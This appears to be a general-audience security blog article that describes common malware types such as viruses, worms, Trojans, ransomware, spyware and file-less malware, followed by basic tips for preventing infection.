To combat malware, it’s important that you get your malware classifications right. These are the different types of malware and explaining how to recognize them:
We tend to refer to all malware as viruses, but it’s not so. A virus modifies other legitimate host files in such a way that when you execute a file in the victim’s system, you also execute the virus. Today, with different kinds of malware infecting the cyber world, computer viruses have become rather uncommon; they comprise less than 10% of all malware.
Remember, viruses infect other files, they are the only malware that infect other files and hence it’s really hard to clean them up. Even the best among antivirus programs struggle with this; most of the time they either delete or quarantine the infected file and don’t get rid of the virus itself.
A worm is self-replicating and spreads without end-user action, causing real devastation. Viruses need end users to kick them off so that they can go on and infect other files and systems. On the other hand, worms don’t need any such end-user action. They’d simply spread by themselves, self-replicating in the process and destroying systems, devices, networks and connected infrastructure as well. Worms spread by exploiting other files and programs to do the spreading work. When one person in an organization opens an email that contains a worm, the entire network in the organization could get infected in just a few minutes.
Trojans, reminding you of what happened during the Trojan war, masquerade as legitimate programs. However, they contain malicious instructions. Trojans mostly arrive via email or spread from infected websites that users visit. They only work when the victim executes it. A user may find a pop up that tells him his system was infected. The pop up would instruct him to run a program to clean his system. He takes the bait, without knowing that it is a Trojan. Trojans are very common, especially because it is easy to write Trojans. Additionally, they are easy because Trojans spread by tricking end-users to execute them. This effectively renders security software useless.
Ransomware, as the name suggests, demands a ransom from you to get things back on track. The main issue with ransomware, which would spread tremendously fast across organizations, networks, and countries, is that they encrypt all files in a system or network, rendering them inaccessible. A ransom note pops up, demanding payment in cryptocurrency, for decrypting the files . If the ransom is not paid, the encrypted files could eventually get destroyed and hence ransomware should be seen as one of the most devastating forms of malware. Most ransomware are Trojans and spread through social engineering. Unfortunately, in some cases, hackers refuse to decry-pt files even after you pay the ransom.
Adware is nothing but attempting to expose users to unwanted, potentially malicious advertising. These ads most likely end up infecting a user’s device. There are adware programs that redirect a user, during browser searches, to look-alike web pages that have promotions of other products. Removing adware is easier. You just need to find the malicious executable and remove it.
Spyware, as the name suggests, helps hackers spy on systems and their users. This kind of malware can be used for key-logging and similar activities, thereby helping hackers gain access to personal data (including login credentials) and intellectual property. Spyware is also used by people who want to keep a check on the computer activities of people personally known to them. Spyware, like adware, is easy to remove.
7. File-less malware
While traditional malware travels and infects systems using the file system, file-less malware travels and infects without directly using files or file systems. Such malware exploits and spread in memory only; they also spread using ‘non-file’ OS objects, like APIs, registry keys etc. File-less malware attacks are mostly initiated with the exploitation of an already existing legitimate program or by using existing legitimate tools that are built into the OS (for example, Microsoft’s Powershell). Thus, it becomes really tough to detect and prevent these kinds of attacks.
8. The hybrid attack
This is rather dangerous and devastating. Today, we have malware that could be a combination of more than one stream of traditional malware. For example, some malware is part virus, part Trojan, and part worm. Such a malware might appear as a Trojan during the initial stage, after which it would perhaps spread like a worm. There are also bots, wherein the hackers use one kind of malware to gain access to hundreds of computers. Those systems are then used (either by the same hackers or by others who purchase them) to carry out other attacks.
Combating malware: Some basic tips
These are some basic things that could help prevent malware infection, to a great extent:
- Update OS, browsers, plugins, etc regularly.
- Use all the necessary security tools, decide it based on your requirements.
- Update all software regularly.
- Watch out for social engineering attacks, stay wary of phishing emails.
- Never click on links or download attachments coming from un-trusted on unknown sources.
- Practice safe browsing.
- Have strong passwords, change passwords periodically.
- Refrain from using un-encrypted public connections.
- Layer your security starting with basic measures like firewall and antivirus.